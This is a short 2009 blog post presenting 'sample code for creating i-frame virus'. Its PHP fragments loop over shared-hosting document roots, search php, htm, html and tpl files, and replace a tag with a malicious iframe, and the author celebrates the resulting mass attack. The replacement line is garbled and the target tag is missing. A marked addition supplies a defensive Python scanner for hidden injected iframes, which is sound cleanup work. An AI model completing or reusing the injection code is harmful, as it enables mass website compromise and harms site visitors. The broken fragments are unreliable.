Tuesday, June 16, 2009

sample code for creating i-frame virus

Once attackers found a vulnerable PHP script, they first mapped the directory hierarchy on the web site. In the case of the sample PHP script, it looked like this:

for ($i = 3; $i < 500; $i++) {
    if ($i == 438) continue;
    flush_buffer('/home/sites/site' . $i . '/web:
');
    iframe_account(array('/home/sites/site' . $i . '/web'));
}

From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().

This function takes every directory and performs a recursive search for 4 file types:

$file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “” tag which is replaced with the malicious iframe and properly closed:

$iframed_content = str_replace(/'/', '', $content);

And lol – a mass attack happened.
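
For defenders cleaning up after this kind of injection, the following is an added example (not code from the original post) that walks a document root, checks the same four file types, and reports iframes that are both hidden and loaded from an absolute URL. The hidden-frame heuristic, the function names and the sample files are assumptions made for illustration.

```python
import os
import re
import tempfile

FILE_TYPES = {"php", "htm", "html", "tpl"}  # the four extensions named in the post
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?\s*((?:https?:)?//[^"'\s>]+)""", re.I)
# Heuristic (an assumption, not from the post): injected frames are made invisible.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*[=:]\s*["']?\s*[01](?:px)?(?![\d.%])"""
    r"|display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def suspicious_iframes(html):
    """Return the src of every hidden iframe that loads an absolute URL."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        src = SRC_RE.search(tag)
        if src and HIDDEN_RE.search(tag):
            hits.append(src.group(1))
    return hits


def scan_docroot(root):
    """Walk root recursively and map each flagged file to its iframe URLs."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.rsplit(".", 1)[-1].lower() in FILE_TYPES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    urls = suspicious_iframes(fh.read())
                if urls:
                    findings[path] = urls
    return findings


def demo():
    """Scan a constructed docroot holding one clean and one injected file."""
    samples = {  # constructed sample content, not taken from a real site
        "index.html": "<html><body><p>hi</p></body></html>",
        "footer.tpl": '<iframe src="http://bad.example/" width="0" height="0"></iframe>',
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "web", "inc"))
        for name, body in samples.items():
            with open(os.path.join(root, "web", "inc", name), "w") as fh:
                fh.write(body)
        return {os.path.basename(p): u for p, u in scan_docroot(root).items()}
```

Flagged files still need manual review: a legitimate page can contain a hidden frame, and an injected one does not have to be hidden.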
